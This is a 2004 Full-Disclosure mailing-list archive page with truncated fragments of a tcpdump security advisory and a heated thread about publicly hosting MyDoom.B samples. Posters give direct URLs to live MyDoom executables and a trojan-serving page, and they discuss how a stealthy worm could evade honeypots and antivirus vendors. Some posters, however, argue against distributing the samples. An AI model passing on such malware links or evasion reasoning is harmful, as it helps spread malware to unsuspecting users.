http://download.fedoralegacy.org/redhat/8.0/updates/i386/tcpdump-3.6.3-17.8.0.5.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/8.0/updates/i386/libpcap-0.6.2-17.8.0.5.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/8.0/updates/i386/arpwatch-2.1a11-17.8.0.5.legacy.i386.rpm

7. Verification:

SHA1 sum Package Name
- ---
a10c0d99cd919f459a25fdb5562d6907667b33d3
7.2/updates-testing/SRPMS/tcpdump-3.6.3-17.7.2.4.l

[Full-Disclosure] [FLSA-2004:1222] Updated tcpdump resolves security vulnerabilites (resend with correct paths)

2004-01-31 Thread Jesse Keating

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- ---
Fedora Legacy Update Advisory

1. Topic:

2. Relevant releases/architectures:

Red Hat Linux 7.2 - i386
Red Hat Linux 7.3 - i386
Red Hat Linux 8.0 - i386

3. Problem description:

Users of tcpdump should update to these update packages, which contain a
backported security patch that corrects this issue.

4. Solution:

Before applying this update, make sure all previously released errata
relevant to your system have been applied.

To update all RPMs for your particular architecture, run:

rpm -Fvh [filenames]

Please note that this update is also available via yum and apt. Many
people find this an easier way to apply updates. To use yum issue:

yum update

or to use apt:

apt-get update; apt-get upgrade

5. Bug IDs fixed:

http://bugzilla.fedora.us - 1222 - tcpdump security fix in rh7x, rh80

6. RPMs required:

Red Hat Linux 7.2:

Red Hat Linux 7.3:

Red Hat Linux 8.0:

7. Verification:

SHA1 sum Package Name
- ---
a10c0d99cd919f459a25fdb5562d6907667b33d3
7.2/updates/SRPMS/tcpdump-3.6.3-17.7.2.4.legacy.src

Re: [Full-Disclosure] another Trojan with the ADO hole? + a twist in the story

2004-01-31 Thread Paul Schmehl

--On Saturday, January 31, 2004 7:35 PM +0200 Gadi Evron 
<[EMAIL PROTECTED]> wrote:

The past Trojan horses which spread this way took advantage of the fact
web servers send an HTML 404 message if a file doesn't exist.
The original sample - britney.jpg - was simply an html file itself, and
using that fact, and IE loading it. It was combined with one of the
latest exploits of the time (I don't think MS patched it yet), and
downloaded the Trojan horses.
This time around there is actually a picture on the web page, of a real
honest to God girl. But in another frame.. the same story all over again.
For blocking purposes, the (un-safe) URL is: http://ut.uk.to/cs.jpg .
Didn't work on my Titanium using Safari.  The girl 
wasuhwell-endowed.  :-)

Paul Schmehl ([EMAIL PROTECTED])
Adjunct Information Security Officer
The University of Texas at Dallas
AVIEN Founding Member
http://www.utdallas.edu
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

RE: [Full-Disclosure] MyDoom download info

2004-01-31 Thread Bojan Zdrnja

 

> -Original Message-
> From: [EMAIL PROTECTED] 
> [mailto:[EMAIL PROTECTED] On Behalf Of 
> Steve Wray
> Sent: Sunday, 1 February 2004 10:46 a.m.
> To: 'Paul Schmehl'; [EMAIL PROTECTED]
> Subject: RE: [Full-Disclosure] MyDoom download info
> 
> If a virus could spread slowly but stealthily, it could be all over
> the planet and activated before any antivirus vendor became aware
> of its presence and came out with a fix; it wouldn't matter much
> if it took a year of quiet spreading.

Nah, that would work if there were no honeypots. I'm sure that 99% of AV
companies, as well as numerous other security companies/individuals run
honeypots and they would catch this pretty quickly as your worm can't know
what's honeypot and what isn't (I'm not going into honeypot detection
techniques now).
Therefore, the only way for a worm to be successful is to spread as fast as
it can, what in turn results in disruptions of service for host machine and
easier detection.

Cheers,

Bojan


___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] MyDoom download info

2004-01-31 Thread Valdis . Kletnieks

On Sun, 01 Feb 2004 10:46:09 +1300, Steve Wray <[EMAIL PROTECTED]>  said:

> but to address the points, as one person wrote, its difficult to spread 
> fast when you are trying to be stealthy; I would argue that if one is 
> stealthy enough, one doesn't need to spread fast since one is trying to 
> evade detection rather than evading elimination.

Very true...

> If a virus could spread slowly but stealthily, it could be all over
> the planet and activated before any antivirus vendor became aware
> of its presence and came out with a fix; it wouldn't matter much
> if it took a year of quiet spreading.

On the other hand, it severely limits your growth potential.

If you go for a spread-fast strategy, you *will* set off all the white
hat's detectors (on sheer unexpected traffic volume, if nothing else).
You then have 100 white hats all starting from ground zero in analyzing
the critter, and you're basically limited to however many systems you
can nail in 8 hours before they get a signature out the door.  But since
you're spreading fast, that's still a lot of systems.

What I probably didn't make clear enough the first time I said it was that
if you're propagating slowly, you need to be *very* careful - all it takes
is for you to hit *one* wrong IDS or honeypot and you've been spotted.
And more importantly for the discussion, even if it takes that researcher
a week of evening and lunch hours to figure out what you're up to, you
won't have gotten many more systems during that week.

Consider that a fast-spreading worm can nail several million boxes, while
the average IRC botnet built more stealthily is in the several 10K range.

> Sometimes (and here I go sounding paranoid again) it seems that the
> viruses and worms we see are nothing but a smokescreen; they are
> SO VERY obvious.

Welcome to the club. Want some tinfoil? :)


pgp0.pgp
Description: PGP signature

Re: [Full-Disclosure] MyDoom download info

2004-01-31 Thread Nick FitzGerald

Roland Dobbins <[EMAIL PROTECTED]> wrote:

> I know Dan Spisak personally, and can vouch for his honesty and 
> integrity.

And _you_ are???

It seems you largely missed the point.

...

Anyway, it is interesting to know that Cisco employs people who think 
there is integrity in both publicly distributing viruses, and doing so 
after repackaging them with a "dropper" that makes them not immediately 
detectible.

-- 
Nick FitzGerald
Computer Virus Consulting Ltd.
Ph/FAX: +64 3 3529854

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] MyDoom download info

2004-01-31 Thread Nico Golde

Hallo Steve,

* Steve Wray <[EMAIL PROTECTED]> [2004-01-31 23:00]:
> > You can always disassemble the virus, which is what people 
> > will do if it's a real "popular" one such as MyDoom. 
> 
> IIRC there are viruses that are encrypted and are almost impossible
> to disassemble?
> 
> Would that be true?
 
i think not forever.
there is a good phrack article about binary encription.
nico
-- 
Nico Golde nico  ngolde  de
public key available on:
http://www.ngolde.de/gpg.html


pgp0.pgp
Description: PGP signature

Re[2]: [Full-Disclosure] MyDoom download info

2004-01-31 Thread Thierry


NF>that x employs people who think
NF>there is integrity in both publicly
NF>distributing viruses

I read F u l l - D i s c l o s u r e
not restricted Disclosure.

I applaud the person who posted the B variant, for me the only chance
to "analyse" that one.

NF> after repackaging them with a "dropper" that makes them not immediately 
NF> detectible.

Let's call this "NAME of File" detection, shall we? It goes like this :
MyDoomA.exe = MyDoomA virus - MyDoomB.exe = MyDoomB virus

Quit the whining and post something productive.

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

RE: [Full-Disclosure] MyDoom.b samples taken down

2004-01-31 Thread Mike

Hi Daniel,
That's unbelievable and incredibly lame of McAfee!!
Are we supposed to sit and wait for our free copies to be delivered to us by
the very people we are trying to stop from getting infected???

I have copied the files to the following locations:
http://homepages.ihug.co.nz/~mjcarter/virus/MyDoomA.exe

http://homepages.ihug.co.nz/~mjcarter/virus/MyDoomB.exe

Mike

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] Behalf Of Daniel
Spisak
Sent: Sunday, February 01, 2004 10:38 AM
To: [Full Disclosure]
Subject: [Full-Disclosure] MyDoom.b samples taken down


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

I have been asked by McAfee to take down my copy of MyDoom.B as they
have insinuated that I am now responsible for this virus spreading.
Sorry guys, I tried to help people out here but it would seem greater
powers are at work here. Don't email me asking for copies as I won't be
giving any more out. I suggest you direct future request for this virus
towards McAfee, perhaps in their infinite wisdom they will be willing
to help other researchers.

Daniel E. Spisak
Security Engineer
OnlineSecurity
www.onlinesecurity.com
[EMAIL PROTECTED]
Cell: 562.331.1603

-BEGIN PGP SIGNATURE-
Version: PGP 8.0.3

iQA/AwUBQBwgKRUn/Hz8mr7jEQJuXQCeJP6dhDigNBmJRZ29spqDOpExQrYAoMyC
7eyngBEgA4TEOEmV1DIzlMNk
=A6V6
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

RE: [Full-Disclosure] MyDoom.b samples taken down

2004-01-31 Thread Frank Knobbe

On Sun, 2004-02-01 at 06:08, Mike wrote:
> I have copied the files to the following locations:
> http://homepages.ihug.co.nz/~mjcarter/virus/MyDoomA.exe
> http://homepages.ihug.co.nz/~mjcarter/virus/MyDoomB.exe

And so the virus spreads again. and by means not anticipated by its
author... Spreading via search engines, and infecting people wanting to
download the Doom sequel...

When posting viruses, may I suggest a mechanism that forces someone to
manually click on a button or enter a number or something? Anything that
prevents automatic download from a URL. Otherwise your web space might
be misused by MyDoomC as a download point.

Regards,
Frank

signature.asc
Description: This is a digitally signed message part

Re: [Full-Disclosure] Re: Script Kiddies

2004-01-31 Thread Valdis . Kletnieks

On Sat, 31 Jan 2004 09:35:13 PST, [EMAIL PROTECTED]  said:

> The only difference between a 'script kiddie' and 90% of the 'security
> experts' out there are the tools they use.

Damn, I've been outed.  The average script kiddie probably has more
exploits on their hard drive than I do, I must be a Ted Sturgeon expert


pgp0.pgp
Description: PGP signature

Re[2]: [Full-Disclosure] MyDoom download info

2004-01-31 Thread J.A. Terranson

On Sun, 1 Feb 2004, Thierry wrote:

> NF>that x employs people who think
> NF>there is integrity in both publicly
> NF>distributing viruses
>
> I read F u l l - D i s c l o s u r e
> not restricted Disclosure.

Exactly.

> Quit the whining and post something productive.

Here here!

-- 
Yours,
J.A. Terranson
[EMAIL PROTECTED]

"Unbridled nationalism, as distinguished from a sane and legitimate
patriotism, must give way to a wider loyalty, to the love of humanity as a
whole. Bah'u'llh's statement is: "The earth is but one country, and mankind
its citizens."

The Promise of World Peace
http://www.us.bahai.org/interactive/pdaFiles/pwp.htm

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] MyDoom.B

2004-01-31 Thread Daniel Spisak

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Look, apparently this is not the list for me to be on. All I was trying 
to do at first was find B to analyze. Then I tried to provide it to 
people via email but that quickly escalated past what I could 
personally handle by myself. Then I gave the URL to the list and now we 
have this fine mess. McAfee was just trying to give me a friendly nudge 
that what I did was probably not the best method of distribution. So 
try to not harbor any ill will towards them, they were just trying to 
do their job. I overreacted and it would seem this situation would 
dearly like to spiral out of control. I never wished to drag people I 
know needlessly into a pissing match. Nor did I ever wish to intend to 
make this variant more active in the wild.

If you are mirroring the files I had previously hosted please take them 
down from your sites and distribute them via email only if at all 
possible. Posting the virus to a URL on this list means it ends up on 
the web archive which means it shows up in Google which means any Tom, 
Dick, or Jane can download the live virus. So if you wish to help 
others email is the way I suggest.

Anyways, I'm going to shut the hell up now for a while and hope that 
what sanity is left can prevail here.

Daniel E. Spisak
Security Engineer
OnlineSecurity
www.onlinesecurity.com
[EMAIL PROTECTED]
Cell: 562.331.1603

-BEGIN PGP SIGNATURE-
Version: PGP 8.0.3

iQA/AwUBQBxKORUn/Hz8mr7jEQJvJQCfdGYHvz5Qlgd76ztAGqHFN7LwuOYAoK3w
qJ8Lx50TPcv9mk1bDWh3HmTu
=RQDD
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] MyDoom.B

2004-01-31 Thread Jeremiah Cornelius

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

On Saturday 31 January 2004 16:37, Daniel Spisak wrote:
> Look, apparently this is not the list for me to be on. All I was trying
> to do at first was find B to analyze. Then I tried to provide it to
> people via email but that quickly escalated past what I could
> personally handle by myself. Then I gave the URL to the list and now we
> have this fine mess. McAfee was just trying to give me a friendly nudge
> that what I did was probably not the best method of distribution. So
> try to not harbor any ill will towards them, they were just trying to
> do their job. I overreacted and it would seem this situation would
> dearly like to spiral out of control. I never wished to drag people I
> know needlessly into a pissing match. Nor did I ever wish to intend to
> make this variant more active in the wild.

You want a job with NA someday?  Not that there's anything /wrong/ with that!

base-64 'em, and post with with an adequate warning - to this list. They'll be 
web-archived within minutes anyway.

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.2.4 (GNU/Linux)

iD8DBQFAHFVVJi2cv3XsiSARAjGaAJ429/SfuaY6O663VEeyObLyqpIzjQCg24l4
i3EQRPe9ZF63i8sWhquVXpU=
=IbcU
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] MyDoom.b samples taken down

2004-01-31 Thread Kurt Weiske

Mike wrote:

That's unbelievable and incredibly lame of McAfee!!
Are we supposed to sit and wait for our free copies to be delivered to us by
the very people we are trying to stop from getting infected???
Daniel and Mike, thanks for making those files available for those of us 
who wish to research this virus firsthand, instead of relying on 
(sometimes) wildly innacurate media and "expert" reporting.

Shame on McAfee for succeeding in intimidating a fellow researcher - I 
guess that's what happens when viruses become Big Business; use whatever 
FUD is available to limit your competitio, increase market share and 
maximize shareholder value. Foo.





___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] MyDoom.b samples taken down

2004-01-31 Thread Nick FitzGerald

Kurt Weiske <[EMAIL PROTECTED]> wrote:

> Daniel and Mike, thanks for making those files available for those of us 
> who wish to research this virus firsthand, instead of relying on 
> (sometimes) wildly innacurate media and "expert" reporting.
> 
> Shame on McAfee for succeeding in intimidating a fellow researcher - I 

It seems that "intimidation" may have been too strong a word -- see  
Daniel's latest post -- but whatever...

> guess that's what happens when viruses become Big Business; use whatever 
> FUD is available to limit your competitio, increase market share and 
> maximize shareholder value. Foo.

No -- that's what happens when you actually have half a clue about the 
huge _further_ damage such things can do if actually successfully 
distributed.  Mydoom.B has largely _not_ taken off, but all it probably 
needs is a touch of the usual "luck" which is all that distinguishes 
most successful mass-mailers from the huge numbers of unsuccessful ones 
lamers, like those on this list clamouring to get a Mydoom.B sample, 
never see.

I know most of you will not believe this because you so stupid you 
already believe that live virus samples are _just_ information and 
therefore _should_ be subject to "full disclosure" (this is a special 
form of ignorance that very little empirical evidence seems able to 
budge -- at least until a holder of the ignorance is the person bitten 
by it), _but_ each extra copy of Mydoom.B downloaded from the various 
URLs published on this list increases the likelihood that the virus 
writer will have his "glory" with the Mydoom.B variant as well.  The 
cost of that far outweighs the value of the jollies a few of you will 
get from working out how to unpack the "hacked" UPX compression  used, 
poking a few clever comments into your disasm, or mastering ROT13 to 
"decrypt" the virus' internal strings.  In the process, some of you 
will run it in a VM connected via virtual network to the real Internet 
(because you are so stupid you believe that "because you run Linux you 
are safe" or you forgot you enabled bridged networking for some 
"special reason" and never got round to disabling it) and more copies 
of it will "escape" (we see this often).  And you want to subject the 
world to that threat because you want to spend hours and hours doing 
what has been done "well enough" in multiple professional security 
company labs for them to ship detection and repair utilities within 
minutes to an hour or two of first receiving a sample of it several 
days ago.  Get real...

Try handling dozens of these a day and then see what you feel about the 
quality of the work of those labs and that 'wildly innacurate [...] 
"expert" reporting'

And save me the almost inevitable full-disclosure mantra BS replies!  I 
really do not want to hear your ignorance rephrased that way, again -- 
at least walk the walk before you try to talk the talk...

-- 
Nick FitzGerald
Computer Virus Consulting Ltd.
Ph/FAX: +64 3 3529854

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Fwd: Re: [Full-Disclosure] another Trojan with the ADO hole? + a twist in the story]

2004-01-31 Thread Daniel H. Renner

Ergh - the http://207.46.110.24/gateway/gateway.dll? address is only a
MSN MSGR site - sorry.

Dan

-Forwarded Message-

From: Paul Schmehl <[EMAIL PROTECTED]>
To: Gadi Evron <[EMAIL PROTECTED]>, [EMAIL PROTECTED], [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] another Trojan with the ADO hole? + a twist in the story
Date: 31 Jan 2004 14:24:21 -0600

--On Saturday, January 31, 2004 7:35 PM +0200 Gadi Evron 
<[EMAIL PROTECTED]> wrote:

> The past Trojan horses which spread this way took advantage of the fact
> web servers send an HTML 404 message if a file doesn't exist.
>
> The original sample - britney.jpg - was simply an html file itself, and
> using that fact, and IE loading it. It was combined with one of the
> latest exploits of the time (I don't think MS patched it yet), and
> downloaded the Trojan horses.
>
> This time around there is actually a picture on the web page, of a real
> honest to God girl. But in another frame.. the same story all over again.
>
> For blocking purposes, the (un-safe) URL is: http://ut.uk.to/cs.jpg .

Didn't work on my Titanium using Safari.  The girl 
wasuhwell-endowed.  :-)

Paul Schmehl ([EMAIL PROTECTED])
Adjunct Information Security Officer
The University of Texas at Dallas
AVIEN Founding Member
http://www.utdallas.edu

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Fwd: Re: [Full-Disclosure] another Trojan with the ADO hole? + a twist in the story]

2004-01-31 Thread Daniel H. Renner

Doesn't work in Mozilla v1.3.1 on Xandros v1.1 either, though the
message was "(111) Connection refused" by
http://mitglied.lycos.de/mycutewebspace, maybe they don't like Mozilla? 
:-)

Our proxy shows the following path when you click the link:
http://freedns.afraid.org/blank.html
http://mitglied.lycos.de/mycutewebspace
http://207.46.110.24/gateway/gateway.dll?

Cheers,
Dan

-Forwarded Message-

From: Paul Schmehl <[EMAIL PROTECTED]>
To: Gadi Evron <[EMAIL PROTECTED]>, [EMAIL PROTECTED], [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] another Trojan with the ADO hole? + a twist in the story
Date: 31 Jan 2004 14:24:21 -0600

--On Saturday, January 31, 2004 7:35 PM +0200 Gadi Evron 
<[EMAIL PROTECTED]> wrote:

> The past Trojan horses which spread this way took advantage of the fact
> web servers send an HTML 404 message if a file doesn't exist.
>
> The original sample - britney.jpg - was simply an html file itself, and
> using that fact, and IE loading it. It was combined with one of the
> latest exploits of the time (I don't think MS patched it yet), and
> downloaded the Trojan horses.
>
> This time around there is actually a picture on the web page, of a real
> honest to God girl. But in another frame.. the same story all over again.
>
> For blocking purposes, the (un-safe) URL is: http://ut.uk.to/cs.jpg .

Didn't work on my Titanium using Safari.  The girl 
wasuhwell-endowed.  :-)

Paul Schmehl ([EMAIL PROTECTED])
Adjunct Information Security Officer
The University of Texas at Dallas
AVIEN Founding Member
http://www.utdallas.edu

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] MyDoom download info

2004-01-31 Thread Roland Dobbins

Please allow me to clarify - I merely intended to indicate that I know 
Dan to be a man of personal and professional integrity, no endorsement 
of the practice was intended, sorry for any confusion.

On Jan 31, 2004, at 2:54 PM, Nick FitzGerald wrote:

Roland Dobbins <[EMAIL PROTECTED]> wrote:

I know Dan Spisak personally, and can vouch for his honesty and
integrity.
And _you_ are???

It seems you largely missed the point.

...

Anyway, it is interesting to know that Cisco employs people who think
there is integrity in both publicly distributing viruses, and doing so
after repackaging them with a "dropper" that makes them not immediately
detectible.
--
Nick FitzGerald
Computer Virus Consulting Ltd.
Ph/FAX: +64 3 3529854
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
-
Roland Dobbins <[EMAIL PROTECTED]> // 408.527.6376 voice
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] MyDoom.b samples taken down

2004-01-31 Thread Kurt Weiske

Nick FitzGerald wrote:

I know most of you will not believe this because you so stupid you 
already believe that live virus samples are _just_ information and 
therefore _should_ be subject to "full disclosure" (this is a special 
form of ignorance that very little empirical evidence seems able to 
budge 
Before I make a judgement here, are you against publishing the virus in 
executable form that could be accidentally launched, or against 
publishing the virus in any form?

If the latter, then perhaps you might find other mailing lists with a 
more sympathetic audience. If the former, after consideration, I agree. 
Handling a live virus is akin to handling their real-world counterparts, 
and having some protection against accidentally launching it on a 
production system is a Good Thing. I've renamed mine to a non-executable 
 extension, and they're off my production boxes.

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] MyDoom.b samples taken down

2004-01-31 Thread Ed Carp

On Sun, 1 Feb 2004, Nick FitzGerald wrote:

> of it will "escape" (we see this often).  And you want to subject the
> world to that threat because you want to spend hours and hours doing
> what has been done "well enough" in multiple professional security
> company labs for them to ship detection and repair utilities within
> minutes to an hour or two of first receiving a sample of it several
> days ago.  Get real...

This is just so arrogant as to be unreal.  And how do you suppose those
"experts" got to be that way?  You wouldn't happen to work in the field,
would you, Nick?

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] MyDoom.b samples taken down

2004-01-31 Thread Kurt Weiske

Nick FitzGerald wrote:

And save me the almost inevitable full-disclosure mantra BS replies!  

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
heh.

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] MyDoom.b samples moved

2004-01-31 Thread mjcarter

>
> Nick FitzGerald wrote:
>
> > And save me the almost inevitable full-disclosure mantra
> BS replies!
>
> > ___
> > Full-Disclosure - We believe in it.
> > Charter:
> http://lists.netsys.com/full-disclosure-charter.html
>
> heh.
>
> ___
> Full-Disclosure - We believe in it.
> Charter:
> http://lists.netsys.com/full-disclosure-charter.html

Due to "popular demand" I've moved the files.

http://homepages.ihug.co.nz/~mjcarter/

You'll have to scroll to the bottom of the page and click on
a link.

Mike

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

49 matches

Mail list logo